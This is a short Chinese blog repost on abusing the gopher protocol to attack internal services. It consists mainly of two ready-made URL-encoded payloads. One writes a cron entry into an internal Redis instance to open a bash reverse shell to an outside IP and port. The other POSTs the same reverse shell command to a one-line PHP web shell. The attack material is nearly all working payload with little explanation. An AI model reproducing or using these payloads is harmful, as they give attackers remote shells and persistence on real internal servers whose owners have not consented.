gopher协议的攻击利用

转自paper.tuisec.win/detail.jsp 

攻击内网redis

攻击redis常见exp为:


对应的gopher协议为:

gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >&/dev/tcp/172.19.23.228/23330>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a



攻击FastCGI 略

攻击内网Vulnerability Web

Gopher 可以模仿 POST 请求,故探测内网的时候不仅可以利用 GET 形式的 PoC(经典的 Struts2),还可以使用 POST 形式的 PoC。

一个只能 127.0.0.1 访问的 exp.php,内容为:

<?php system($_POST['e']);?>

利用方式:


构造gopher协议的url:

gopher://127.0.0.1:80/_POST /exp.php HTTP/1.1%0d%0aHost:127.0.0.1%0d%0aUser-Agent: curl/7.43.0%0d%0aAccept:*/*%0d%0aContent-Length:49%0d%0aContent-Type: application/x-www-form-urlencoded%0d%0a%0d%0ae=bash -i >%2526/dev/tcp/172.19.23.228/23330>%25261null


最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 一套实用的渗透测试岗位面试题,你会吗? 1.拿到一个待检测的站,你觉得应该先做什么? 收集信息 whois、网站源...
    g0阅读 4,882评论 0 9
  • 本文主要讲解具体有哪些攻击 Web 站点的手段,以及攻击会造成怎样的影响。 针对 Web 应用的攻击模式 对 We...
    杰哥长得帅阅读 1,724评论 0 5
  • 1.XSS (Cross Site Script) ,跨站脚本攻击 有句话说 所有的输入都是有害的。 跨站脚本是最...
    大颓宝宝阅读 17,264评论 1 23
  • 国家电网公司企业标准(Q/GDW)- 面向对象的用电信息数据交换协议 - 报批稿:20170802 前言: 排版 ...
    庭说阅读 11,132评论 6 13
  • 一、什么才是”远程文件包含漏洞”? 回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来...
    喜欢吃栗子阅读 2,676评论 1 4